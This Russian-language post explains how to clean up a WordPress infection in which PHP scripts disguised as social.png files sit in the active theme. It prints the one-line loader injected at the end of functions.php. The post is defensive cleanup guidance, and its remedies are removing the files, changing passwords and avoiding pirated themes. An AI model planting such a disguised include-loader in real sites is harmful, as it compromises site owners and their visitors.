Вирус social0.png
Название вируса в заголовке произвольное. Надо же было его как-то идентифицировать. Проблема замечена на сайтах работающих на WordPress.
Симптомы:
- долго открываются страницы на сайте
- выпадает белая страница при активации/деактивации плагинов, сохранении записей/страниц
- белая страница может выпадать при открытии записи для редактирования
Осмотр сайта-пациента
При осмотре файлов и папок сайта было обнаружено это:
а) в корне активной темы (шаблона) обнаружено несколько файлов:
social.png, social0.png, social1.png (может быть больше).
На самом деле это не графические файлы, а php-скрипты (расширение .png добавили чтобы замаскировать их и не вызвать подозрение).
Беглый просмотр кода показывает, что идет обмен данным между серверами (жертвой и хакером).
б) добавлена новая функция в файл темы functions.php (всегда в конце файла):
<?php if (!defined('WP_OPTION_KEY')) { include_once 'social.png'; } if (!defined('WP_OPTION_KEY')) { include_once 'social0.png'; }
Эта функция подключает скрипты для их выполнения на вашем сайте.
Замечено, что заражаются все сайты на одном аккаунте на хостинге. Вирус проникает и действует в активной теме (шаблоне).
Лечение
1. На всех сайтах (которые привязаны к одному аккаунту на хостинге) необходимо:
а) Удалить в активной теме все файлы social.png, social0.png, social1.png и т.д.
б) в каждом файле functions.php убрать чужую функцию.
2. Поменять пароли к фтп, админке сайта и к базе данных.
3. Удалить на сайтах все темы взятые из паблика (а не из официального источника).
Профилактика
Главное правило: не используйте темы и плагины из паблика. Это один из основных источников заражения вашего сайта.